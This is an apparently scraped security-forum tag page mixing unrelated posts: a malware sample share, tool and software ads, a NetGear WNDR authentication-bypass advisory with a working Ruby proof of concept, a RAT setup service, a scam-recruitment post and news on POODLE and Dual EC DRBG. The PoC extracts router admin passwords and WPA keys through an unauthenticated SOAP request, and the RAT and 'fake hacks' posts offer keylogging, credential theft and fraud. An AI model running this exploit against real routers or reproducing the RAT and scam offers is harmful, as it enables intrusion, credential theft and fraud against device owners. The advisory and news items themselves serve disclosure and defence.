Search the Community
Showing results for tags 'support'.
-
mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source
-
- attach
- keylogging
-
(and 3 more)
Tagged with:
-
ArkDasm ArkDasm is a 64-bit interactive disassembler and debugger for Windows. Supported file types: PE64, raw binary files. Supported processor: x64 architecture (Intel x64 and AMD64) ArkDasm is released as Freeware. Current version: 1.0.0 (April 19, 2015) Main features: parsing PE32+ imports, exports, resources subroutine stack data (arguments, local variables) recognition loading local debug symbols (.pdb file) using DIA multiline comments support bookmarks support python script support possibility to save, load database What's new: added debugger capabilities added new commands: bp, ba switched to the Capstone disasm engine updated Qt to 5.4.0 switched to Visual Studio 2013 minor improvements, bug fixes Link: ArkDasm
-
Traffic Left: None Expiration Date: Expired Log in 1fichier.com UNLIMITED Excellent Support! On 24uploading.com UNLIMITED Excellent Support! On 2drive.net UNLIMITED Excellent Support! On 2shared.com UNLIMITED Excellent Support! On 4shared.com UNLIMITED Excellent Support! On bestreams.net UNLIMITED Excellent Support! On dailymotion.com UNLIMITED Excellent Support! On daofile.com UNLIMITED Excellent Support! On datafile.com UNLIMITED Excellent Support! On datei.to UNLIMITED Excellent Support! On deezer.com UNLIMITED Excellent Support! On depfile.com UNLIMITED Excellent Support! Off dfiles.eu UNLIMITED Excellent Support! Off easybytez.com UNLIMITED Excellent Support! On en.vidivodo.com UNLIMITED Excellent Support! On fileapace.com UNLIMITED Excellent Support! On filecloud.io UNLIMITED Excellent Support! On filefactory.com UNLIMITED Excellent Support! On fileflyer.com UNLIMITED Excellent Support! On filejoker.net UNLIMITED Excellent Support! Off filepost.com UNLIMITED Excellent Support! On filer.net UNLIMITED Excellent Support! On filerio.in UNLIMITED Excellent Support! Off filesabc.com UNLIMITED Excellent Support! On filesmonster.com 2000 Excellent Support! Off gboxes.com UNLIMITED Excellent Support! On gigasize.com UNLIMITED Excellent Support! On girlfriendvideos.com UNLIMITED Excellent Support! On inclouddrive.com UNLIMITED Excellent Support! Off interfile.net UNLIMITED Excellent Support! On isavelink.com UNLIMITED Excellent Support! On ishare.rediff.com UNLIMITED Excellent Support! On junocloud.me UNLIMITED Excellent Support! On keep2share.cc UNLIMITED Under Maintenance! Off keezmovies.com UNLIMITED Excellent Support! On kingfiles.net UNLIMITED Excellent Support! On lafiles.com UNLIMITED Excellent Support! On letitbit.net UNLIMITED Excellent Support! On limefile.com UNLIMITED Excellent Support! On mediafire.com UNLIMITED Excellent Support! On mediafree.co UNLIMITED Excellent Support! On mega.co.nz UNLIMITED Excellent Support! On megairon.net 5120 Excellent Support! Off megarapid.cz UNLIMITED Excellent Support! Off megashares.com UNLIMITED Excellent Support! On metacafe.com UNLIMITED Excellent Support! On movshare.net UNLIMITED Excellent Support! On netload.in UNLIMITED Excellent Support! On nitroflare.com 1024 Excellent Support! Off nosvideo.com UNLIMITED Excellent Support! On novamov.com UNLIMITED Excellent Support! On nowdownload.ch UNLIMITED Excellent Support! On oboom.com UNLIMITED Excellent Support! On pornhub.com UNLIMITED Excellent Support! On rapidfileshare.net UNLIMITED Excellent Support! On rapidgator.net UNLIMITED Excellent Support! On rarefile.net UNLIMITED Excellent Support! On redtube.com UNLIMITED Excellent Support! On rockfile.eu UNLIMITED Excellent Support! Off ryushare.com UNLIMITED Excellent Support! On salefiles.com UNLIMITED Excellent Support! On scribd.com UNLIMITED Excellent Support! On sdilej.cz UNLIMITED Excellent Support! On secureupload.eu UNLIMITED Excellent Support! Off sendspace.com UNLIMITED Excellent Support! On sharebeast.com UNLIMITED Excellent Support! On share-online.biz UNLIMITED Excellent Support! Off slideshare.net UNLIMITED Excellent Support! On soundcloud.com UNLIMITED Excellent Support! Off speedyshare.com UNLIMITED Excellent Support! Off streamcloud.eu UNLIMITED Excellent Support! On subyshare.com UNLIMITED Excellent Support! Off tube8.com UNLIMITED Excellent Support! On turbobit.net 5120 Excellent Support! On tusfiles.net UNLIMITED Excellent Support! On uloz.to UNLIMITED Excellent Support! Off unibytes.com UNLIMITED Excellent Support! On unlimitzone.com UNLIMITED Excellent Support! On upasias.com UNLIMITED Excellent Support! On uplea.com UNLIMITED Excellent Support! On upload.cd UNLIMITED Excellent Support! On uploadable.ch UNLIMITED Excellent Support! On uploaded.to UNLIMITED Excellent Support! On uploadhero.co UNLIMITED Excellent Support! Off uploading.com UNLIMITED Excellent Support! On upstore.net UNLIMITED Excellent Support! Off uptobox.com UNLIMITED Excellent Support! On video.tt UNLIMITED Excellent Support! On videobam.com UNLIMITED Excellent Support! On videoweed.es UNLIMITED Excellent Support! On vimeo.com UNLIMITED Excellent Support! On webshare.cz UNLIMITED Excellent Support! On wipfiles.net UNLIMITED Excellent Support! On worldbytez.com UNLIMITED Excellent Support! On xhamster.com UNLIMITED Excellent Support! On xnxx.com UNLIMITED Excellent Support! On xvideos.com UNLIMITED Excellent Support! On youjizz.com UNLIMITED Excellent Support! On youporn.com UNLIMITED Excellent Support! On youtube.com UNLIMITED Excellent Support! On yuvutu.com UNLIMITED Excellent Support! On zippyshare.com UNLIMITED Excellent Support! On decrypt.. EZ x5 14935.134380067228/6587.172835055412/8661.730096976473/14258.615576480937/15077.804593044082/4292.190235557092/14259.80454297436/15762.843499031596/15080.424228006532/15074.742462671664/15617.384787465673/14259.719082347838/14798.66591007625/6203.545547902815/4264.332250930184/7681.431061884185/7681.432826725825/15621.623806958996/14944.742869254202/16418.44401690272/13165.564428137908/13441.659588833189/6031.391296781331/13716.169092178625/1300.467862527994/13174.603019867478/15082.668675528668/14798.66591007625/6203.545547902815/4264.332812101029/13167.170149378662/15570.982643908197/15626.830537107848/6451.8250639047355/13165.03820441141/6203.545547902815/4264.332259063095/7267.822254567176/-126.04252573590705
-
- excellent
- slideshare.net
-
(and 3 more)
Tagged with:
-
365 Days FREE VPN ll Port Support Free VPN Client Software | Free VPN Proxy | Free VPN Download
-
Product Description Ashampoo Snap 7 is the smartest way to capture screenshots, add notes and annotations and share them with your friends. With Ashampoo Snap 7 … … you capture images and videos right from your screen in seconds Capture rectangular regions Use free form capture for maximum flexibility Use timers for interval capturing … you have the tools to express yourself visually Get your message across with texts, hints and notes Command attention with arrows, shapes and stamps Use the pencil tool to draw freely … sharing becomes a breeze Save your screenshots to common image formats Create PDFs without extra tools Upload to Facebook, Twitter and Ashampoo Webspace with ease Ashampoo Snap 7 is ideal for beginners and professionals alike. Experience visually intuitive controls Enjoy smooth 1-click operations Quickly access tools through the capture bar New in Ashampoo Snap 7 Smoother workflow Ashampoo Snap 7 uses optimized drawing routines to provide a smoother, rounder look and feel that you will simply love. Less complexity With Ashampoo Snap 7, it takes less clicks to achieve your goals. Save time and boost your productivity. Smarter work environment Ashampoo Snap 7 employs smart background versioning so your original image is never lost and all modifications remain editable. Want to start over? Revert to the original at the click of a button. More creative freedom Ashampoo Snap 7 has all the tools you know and love and improves them. Apply gradients to almost any object, use the new outline style for visual accents, work with curved lines and arrows or 1-click clone objects for simple reuse. Not sure which application window you will later need? Simply use the new “Capture all visible desktop windows as objects” and capture all of them at once. The windows will then be captured into a single project but remain movable and resizable right from within Snap. Sharing has never been easier You no longer require an installed application to email your work, thanks to the integrated support for browser-based email clients. The integration with common file hosting services has also been greatly improved with integrated support for Dropbox, Google Drive and Microsoft Sky Drive. Need an even easier way to share your work? Upload it to Ashampoo Webspace, now with HTML 5 video support, and share a unique Internet link with your friends. Furthermore, Ashampoo Snap 7 features JXR and PSD export with layers for easy processing, e.g. with Adobe Photoshop, for power users. Grab 50% Discount Coupon on Ashampoo Snap 8 Here -> Download <-Deal Expire in: EXPIRED!
-
>> NetGear WNDR Authentication Bypass / Information Disclosure Reported by: ---- Peter Adkins <peter.adkins () kernelpicnic.net> Access: ---- Local network; unauthenticated access. Remote network; unauthenticated access*. Tracking and identifiers: ---- CVE - Mitre contacted; not yet allocated. Platforms / Firmware confirmed affected: ---- NetGear WNDR3700v4 - V1.0.0.4SH NetGear WNDR3700v4 - V1.0.1.52 NetGear WNR2200 - V1.0.1.88 NetGear WNR2500 - V1.0.0.24 Additional platforms believed to be affected: ---- NetGear WNDR3800 NetGear WNDRMAC NetGear WPN824N NetGear WNDR4700 Vendor involvement: ---- 2015-01-18 - Initial contact with NetGear regarding vulnerability. 2015-01-18 - NetGear advised to email support with concerns. 2015-01-18 - Email sent to NetGear (support). 2015-01-19 - Email sent to Mitre. 2015-01-20 - NetGear (support) advised that a ticket had been created. 2015-01-21 - NetGear (support) requested product verification. 2015-01-21 - Replied to NetGear with information requested. 2015-01-23 - NetGear (support) requested clarification of model. 2015-01-23 - Replied to NetGear with list of affected models. 2015-01-27 - NetGear (support) replied with router security features. 2015-01-27 - Replied to NetGear and reiterated vulnerability. 2015-01-29 - Email sent to NetGear (OpenSource) regarding issue. 2015-01-30 - Case auto-closure email received from NetGear (support). 2015-02-01 - Reply from Mitre requesting additional information. 2015-02-01 - Email to Mitre with additional information. 2015-02-11 - Vulnerability published to Bugtraq and GitHub. Mitigation: ---- * Ensure remote / WAN management is disabled on the affected devices. * Only allow trusted devices access to the local network. Notes: ---- * These vulnerabilities can be leveraged "externally" over the internet, but require devices to have remote / WAN management enabled. * Due to the location of this issue (net-cgi) this vulnerability may be present in other devices and firmware revisions not listed in this document. * In the absence of a known security contact these issues were reported to NetGear support. The initial response from NetGear support was that despite these issues "the network should still stay secure" due to a number of built-in security features. Attempts to clarify the nature of this vulnerability with support were unsuccessful. This ticket has since been auto-closed while waiting for a follow up. A subsequent email sent to the NetGear 'OpenSource' contact has also gone unanswered. * If you have a NetGear device that is believed to be affected and can confirm whether the PoC works successfully, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings. ---- "Genie" SOAP Service ---- A number of NetGear WNDR devices contain an embedded SOAP service that is seemingly for use with the NetGear Genie application. This service allows for viewing and setting of certain router parameters, such as: * WLAN credentials and SSIDs. * Connected clients. * Guest WLAN credentials and SSIDs. * Parental control settings. At first glance, this service appears to be filtered and authenticated; HTTP requests with a `SOAPAction` header set but without a session identifier will yield a HTTP 401 error. However, a HTTP request with a blank form and a `SOAPAction` header is sufficient to execute certain requests and query information from the device. As this SOAP service is implemented by the built-in HTTP / CGI daemon, unauthenticated queries will also be answered over the internet if remote management has been enabled on the device. As a result, affected devices can be interrogated and hijacked with as little as a well placed HTTP query. The attached proof of concept uses this service in order to extract the administrator password, device serial number, WLAN details, and various details regarding clients currently connected to the device. A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR ---- Ruby PoC ---- require 'optparse' require 'nokogiri' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.1.1" options[:port] = 80 options[:ssl] = false OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.on("--[no-]ssl", "Destination uses SSL") do |s| options[:ssl] = s end option.parse! end # Define which SOAPActions we will be using. actions = [ { :name => "Fetch password", :call => "lan_config_security_get_info", :soap => "LANConfigSecurity:1#GetInfo" }, { :name => "Fetch WLAN", :call => "wlan_config_get_info", :soap => "WLANConfiguration:1#GetInfo" }, { :name => "Fetch WPA Security Keys", :call => "wlan_config_get_wpa_keys", :soap => "WLANConfiguration:1#GetWPASecurityKeys" }, { :name => "Fetch hardware", :call => "device_info_get_info", :soap => "DeviceInfo:1#GetInfo" }, { :name => "Fetch hardware", :call => "device_info_get_attached", :soap => "DeviceInfo:1#GetAttachDevice" } #{ # :name => "Dump configuration", # :call => "device_config_get_config_info", # :soap => "DeviceConfig:1#GetConfigInfo" #} ] def device_info_get_info(xml) puts "[*] Model Number: #{xml.xpath('//ModelName').text}" puts "[*] Serial Number: #{xml.xpath('//SerialNumber').text}" puts "[*] Firmware Version: #{xml.xpath('//Firmwareversion').text}" end def lan_config_security_get_info(xml) puts "[*] Admin Password: #{xml.xpath("//NewPassword").text}" end def wlan_config_get_info(xml) puts "[*] WLAN SSID: #{xml.xpath('//NewSSID').text}" puts "[*] WLAN Enc: #{xml.xpath('//NewBasicEncryptionModes').text}" end def wlan_config_get_wpa_keys(xml) puts "[*] WLAN WPA Key: #{xml.xpath('//NewWPAPassphrase').text} " end def device_config_get_config_info(xml) puts "[*] Base64 Config: #{xml.xpath('//NewConfigFile').text} " end def device_info_get_attached(xml) # Data is '@' delimited. devices = xml.xpath('//NewAttachDevice').text.split("@") devices.each_index do |i| # First element is a device count. if i == 0 next end # Split by ';' which pulls out the device IP, name and MAC. detail = devices[i].split(";") puts "[*] Attached: #{detail[2]} - #{detail[1]} (#{detail[3]})" end end # Form endpoint based on protocol, no path is required. if options[:ssl] endpoint = "https://#{options[:addr]}:#{options[:port]}/" else endpoint = "http://#{options[:addr]}:#{options[:port]}/" end # Iterate over all actions and attempt to execute. puts "[!] Attempting to extract information from #{endpoint}" actions.each do |action| # Build the target URL and setup the HTTP client object. request = RestClient::Resource.new( endpoint, :verify_ssl => OpenSSL::SSL::VERIFY_NONE) # Fire the request and ensure a 200 OKAY. begin response = request.post( { "" => "" }, { "SOAPAction" => "urn:NETGEAR-ROUTER:service:#{action[:soap]}"}) rescue puts "[!] Failed to query remote host." abort end if response.code != 200 puts "[-] '#{action[:name]}' failed with response: #{response.code}" next end # Parse XML document. xml = Nokogiri::XML(response.body()) if xml.xpath('//ResponseCode').text == '401' puts "[-] '#{action[:name]}' failed with a SOAP error (401)" next end # Send to the processor. send(action[:call], xml) end # FIN. Source
-
- information
-
(and 3 more)
Tagged with:
-
Avantaje pentru cei care se inregistreaza la mine: * Pentru inceput va ajut sa intelegeti metoda youtube. * Sau torrente in functie de ce se potriveste mai bine fiecarei persoane *Iar cei care au potential vor avea parte de mai mult suport din partea mea persoanele care isi dau interesul vor primii si alte nise mai profitabile Am 3 programe din care va trebuii sa va alegeti unul singur sa lucrati pe el: Program 1: -80% Reffback -Support Mess -Plata Net20 Program 2: -40%reffback -Support Mess -Plata Net10 -Ajutor in cautarea niselor + promovarea lor Program 3: - No reffback -Support Mess/Skype -Support TeamViewer -Ajutor in cautarea niselor + promovarea lor -Site pe care sa va promovati nisele -Va fac eu Hackuri Fake daca stiti sa faceti videouri bune -Conturi youtube Free in functie de cat produceti -Plata INSTANT Minimul de plata: 2$ Metode de plata: PayPal, Perfect Money, Transfer Orange In functie de cati bani faceti in prima luna va pot oferi conturi youtube gratis (nu sute) Pe dreamcash accept doar persoane care stiu cu ce se mananca ppd Link reff: IL DAU PRIN PM Contact: YM: just_fly_2010@yahoo.com Skype: Koko XD / koko.mast3r
-
FULL RAT SETUP & SUPPORT 24/7 Do you want to have your own working rat but have no idea where to start? Do you need someone to setup everything for you? Do you need someone to teach you all you need to know? Do you need someone to an swell all your questions on RATs? I am a very experienced user in RATs and I am offering members of RST a Professional service to make sure you will have a working RAT in no time for almost no cost ( Not charging precisely but i welcome gifts and appreciations) General Functions ----------------------- – Access and Administrate Computers from Anywhere – Remote Customer Support – Telecommuting – Remote Access and Communication – Remote File Management – Remote System Activity Management – Password recovery tool (Chrome, Safari, IE, FF, Filezilla, Windows Live Messenger, No-IP, IDM and many more – Keylogger – Remote Shell (Command Interpreter) – Web Downloader (HTTP) – Screen Viewer – Bandwidth Limiter – Proxy Tunneling – Reverse Socks 4/5 Proxy Server – Local Applications Proxifier – Data Transferring List Of Rats --------------------- 1.Casa RAT 2.Back Orifice 3.Bandook RAT 4.Dark Comet Rat 5.Cerberus 6.Cybergate 7.Blackshades 8.Poison Ivy 10.Syndrome RAT 11.Team Viewer 12.Y3k RAT 13.Snoopy 15.5p00f3r.N$ RAT 16.NetBus 17.SpyNet 18.P. Storrie RAT 19.Turkojan Gold 20.Bifrost 21.Lost Door 22.Beast 23.Shark 24.Sub7 25.Pain RAT 26.xHacker Pro RAT 27.Seed RAT 28.Optix Pro RAT 29.Dark Moon 30.NetDevil 31.Deeper RAT 32.MiniMo RAT Contact: Send me a PM or email/chat me up on Yahoo IM: ratsetup247@yahoo.com Jabber : ratsetup247@exploit.im
-
Google, among several security organizations, recently announced a vulnerability in the SSL protocol, particularly SSL version 3. SSL is used to secure connections between a client and server to prevent eavesdropping, and that the data has not been tampered. SSLv3 is an old version of the SSL protocol, dating back to 1996 and debuted with Netscape Navigator. While a very old version of SSL, it is still widely supported by browsers and servers today. According to SSL Pulse, 98% of web servers support SSLv3 in October 2014. Fortunately more secure replacements for SSLv3 have existed for a long time, such as TLS 1.0. Since TLS has been widely adopted for several years now, nearly all browsers will opt to use TLS instead of SSLv3. The POODLE vulnerability is a flaw in the design of the algorithm, not a bug in a particular software implementation like Heartbleed. POODLE is similar to the BEAST attack, which targets SSLv3 and ciphers that use cipher block chaining (CBC). POODLE (Padding Oracle On Downgraded Legacy) targets users by being active on the network, similar to a man-in-the-middle attack. With the attacker having access to the network, he can force the SSL connection to the lower-grade protocol SSLv3 by interrupting the SSL handshake. Once the attacker has forced the connection to use SSLv3, he can attack the client and force characteristics of the connection that make it predictable. One way an attacker might accomplish this is with a Cross Site Scripting, or XSS. If the attacker is successful, he will be able to steal sensitive information such as authentication cookies. The simplest and most effective way to address this is to completely disable support for SSLv3. This is recommended for server administrators to ensure no clients connect to their resources using old versions of SSL. In another blog post we detailed how to lock down and remove older versions of SSL from the server. For desktop administrators, disable support for SSLv3 at the browser level. This can be accomplished with Group Policy for Internet Explorer. Since TLS is widely deployed, turning off SSLv3 support will have a small impact on most people. Internet Explorer 6 remains the only browser that does not support anything better than SSLv3. As support for SSLv3 is removed over the coming weeks, IE 6 users will have more difficulty using secure websites. IE 6 does support TLS 1.0, however is off by default. Enabling TLS 1.0 in IE 6 can be used as a short term work around until a newer version of IE is installed. Source
-
The US National Security Agency (NSA) has offered some sort of apology for pushing insecure cryptography solutions to businesses, describing it as a "regrettable" move. Michael Wertheimer, director of research at the NSA, made the admission about the agency's support of the widely criticised Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) in a letter published by the American Mathematical Society (PDF). Dual EC DRBG is a random number generator used by numerous encryption systems that was supported by the NSA throughout the 2000s. The NSA endorsement was a key factor that led the US National Institute of Standards and Technology (NIST) to list the generator as trustworthy. Security firm RSA subsequently integrated Dual EC DRBG into its widely used BSAFE toolkits, despite research from Microsoft and private experts, including cryptography expert Bruce Schneier, suggesting there were backdoors in the system. Reports subsequently broke alleging that the NSA paid RSA $10m to load the tool with the flawed algorithm. RSA has consistently denied this claim. The allegations gained new weight in 2014 when documents leaked by Edward Snowden suggested that ties between the NSA and RSA were deeper than first thought. Addressing these claims, Wertheimer said: "With hindsight, the NSA should have ceased supporting the Dual EC DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. "In truth, I can think of no better way to describe our failure to drop support for the Dual EC DRBG algorithm as anything other than regrettable." He added that the reason for the continued support was a mistaken belief that deploying a new algorithm would be too costly. "The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm," read the letter. "Indeed, we support NIST's April 2014 decision to remove the algorithm. Furthermore, we realise that our advocacy for the Dual EC DRBG casts suspicion on the broader body of work the NSA has done to promote secure standards." Wertheimer went on to apologise to the maths research community and request that they "continue" to trust the NSA. "NSA mathematicians are fighters in the war on international terrorism, weapons of mass destruction proliferation, narcotics trafficking and piracy," read the report. "It is my sincerest hope that the American Mathematical Society will always see NSA mathematicians as an important part of its membership. "I further hope that dialogue on important issues will always be respectful, informed and focused on inclusivity." The claim has divided the security community, some expressing sympathy towards the NSA and others questioning its cries of innocence. Professor Alan Woodward, of the School of Computer Science at University of Surrey, told V3 that the dangers of pushing a faulty security system far outweigh the benefits for intelligence agencies, such as the NSA. "It is worth remembering that part of the NSA's role is to help secure US government communications as well as gathering foreign intelligence," he said. "It's a bit of a truism but worth repeating: if you deliberately weaken encryption for one set of people whom you consider adversaries, you will weaken it for those you seek to protect as well. "I can imagine that the NSA and every single other signals interception organisation are looking for ways to decrypt internet-based communications. "But I think most realise the dangers of trying to deliberately weaken what is in use. At least I really hope they do." Matthew Green, assistant research professor at the Information Security Institute of Johns Hopkins University, was less positive, pointing out that the NSA still hasn't said why it pushed the standard in the first place, given its technical expertise. "On closer examination, the letter doesn't express regret for the inclusion of Dual EC DRBG in national standards," he noted in a public post. "The transgression Dr Wertheimer identifies is merely that the NSA continued to support the algorithm after major questions were raised. That's bizarre. "It troubles me to see such confusing statements in a publication of the American Mathematical Society. As a record of history, Dr Wertheimer's letter leaves much to be desired, and could easily lead people to the wrong understanding. "Given the stakes, we deserve a more exact accounting of what happened with Dual EC DRBG. I hope someday we'll see that." Wertheimer's comments come during a heated debate about encryption. UK prime minister David Cameron announced plans on 13 January to block encrypted services as a part of a wave of new surveillance laws. Source
-
In a new article in an academic math journal, the NSA’s director of research says that the agency’s decision not to withdraw its support of the Dual EC_DRBG random number generator after security researchers found weaknesses in it and questioned its provenance was a “regrettable” choice. Michael Wertheimer, the director of researcher at the National Security Agency, wrote in a short piece in Notices, a publication of the American Mathematical Society, that even during the standards development process for Dual EC many years ago, members of the working group focused on the algorithm raised concerns that it could have a backdoor in it. The algorithm was developed in part by the NSA and cryptographers were suspect of it from the beginning. Then, in 2007, well into the life of Dual EC, researchers at Microsoft delivered a talk at a conference that detailed the potential for a backdoor in the algorithm. Still, both the NSA and NIST, which approves technical standards for the United States government, stood by the algorithm. Dual EC was mostly forgotten until late 2013 when allegations emerged that the NSA may have had a secret $10 million contract with RSA Security that prompted the vendor to make Dual EC–which was then known to be weak–the default random number generator in some of its key crypto products. NIST last year removed Dual EC from its guidance on random number generators. “I wrote about it in 2007 and said it was suspect. I didn’t like it back then because it was from the government,” crypto pioneer Bruce Schneier told Threatpost in September 2013. “It was designed so that it could contain a backdoor. Back then I was suspicious, now I’m terrified.” The NSA came under heated criticism for the Dual EC episode, and now one of the agency’s top officials has said it was a mistake for the NSA not to have withdrawn its support for the algorithm after the weaknesses were raised years ago. “With hindsight, NSA should have ceased supporting the dual EC_DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. In truth, I can think of no better way to describe our failure to drop support for the Dual_EC_DRBG algorithm as anything other than regrettable,” Wertheimer wrote in a piece in Notices’ February issue. “The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm. Indeed, we support NIST’s April 2014 decision to remove the algorithm. Furthermore, we realize that our advocacy for the DUAL_EC_DRBG casts suspicion on the broader body of work NSA has done to promote secure standards. Indeed, some colleagues have extrapolated this single action to allege that NSA has a broader agenda to ‘undermine Internet encryption.'” Wertheimer said that the agency is trying to combat that perception by changing the way that it contributes to standards efforts in order to be more transparent and accountable. “One significant, and correct, change is that all NSA comments will be in writing and published for review. In other words, we will be open and transparent about our cryptographic contributions to standards. In addition, we will publish algorithms before they are considered for standardization to allow more time for public scrutiny,” Wertheimer wrote. “With these measures in place, even those not disposed to trust NSA’s motives can determine for themselves the appropriateness of our submissions, and we will continue to advocate for better security in open-source software, such as Security Enhancements for Linux and Security Enhancements for Android.” Source